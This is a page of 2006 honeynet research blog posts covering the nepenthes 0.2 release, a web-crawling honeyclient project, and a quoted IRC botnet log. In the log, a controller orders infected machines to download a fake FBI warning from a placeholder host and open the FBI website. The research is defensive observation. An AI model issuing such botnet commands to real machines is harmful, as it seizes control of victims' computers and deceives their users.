Nepenthes 0.2

Friday, November 17. 2006
A new version of nepenthes is now available for download. Main changes for nepenthes 0.2 are:
  • module-honeytrap: a new module that ports the idea of honeytrap by Tillmann Werner to nepenthes.
  • submit-postgres: a module to collect binaries in a central database
  • preliminary integration of CWSandbox in nepenthes via submit-norman
  • some fixes and additions to existing modules
Posted by Thorsten Holz in honeynets at 17:08 | Comment (1) | Trackbacks (0)

Fun With Botnets

Friday, November 10. 2006
Sometimes it is funny to observer botnets since the controllers are pretty creative in what they do. One example:
08:59 <@F00b4r> .download http://www.example.org/fbi.txt c:\fbi.txt 1

09:00 <@F00b4r> .open www.fbi.gov

The text file contains the follow text:
Greetings,

This is fbi, we are investigating your computer, please dont touch the computer

for the next 5minutes, thanks.

I'm wondering how the victims react once such a text pops up and simultaneously the web site of the FBI opens in their browser...
Posted by Thorsten Holz in honeynets at 13:09 | Comments (0) | Trackback (1)

Low-Interaction Honeyclient

Friday, November 10. 2006
I think I did not blog about this project yet, so here some news from our lab and the German Honeynet Project. Ali Ikinci implements as part of his diploma thesis a low-interaction honeyclient that is capable of detecting malicious websites based on signatures. The basic idea is to crawl the Web and then examine the downloaded files with different kinds of mechanisms. We start with simple heuristics like the output of common AV engines, but we plan to also integrate more advanced analysis methods, e.g., with the help of CWSandbox. In addition, we will extend the honeyclient with other input mechanisms like e-mails.

Crawling the Web is fun, especially with a big pipe and a one terrabyte ethernet disk. Some stats from preliminary tests: we downloaded more than 175,000 URIs in about one hour. The download itself runs with a couple of hundred KB/sec on average and we collected more than 4 GB of data during this span of time. We already detected some malware in this data, more stats will follow in the next few weeks.
Posted by Thorsten Holz in honeynets at 00:27 | Comments (0) | Trackbacks (0)
« previous page   (Page 2 of 2, totaling 8 entries)